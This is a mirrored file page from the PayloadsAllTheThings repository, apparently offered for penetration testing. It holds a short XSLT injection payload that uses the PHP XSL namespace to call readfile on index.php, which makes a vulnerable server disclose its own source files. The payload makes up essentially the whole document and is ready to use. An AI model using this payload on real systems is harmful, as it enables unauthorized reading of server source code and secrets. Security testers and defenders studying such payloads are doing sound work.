mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
6 lines
229 B
XML
6 lines
229 B
XML
<?xml version="1.0" encoding="UTF-8"?>
|
|
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
|
<body>
|
|
<xsl:value-of select="php:function('readfile','index.php')" />
|
|
</body>
|
|
</html> |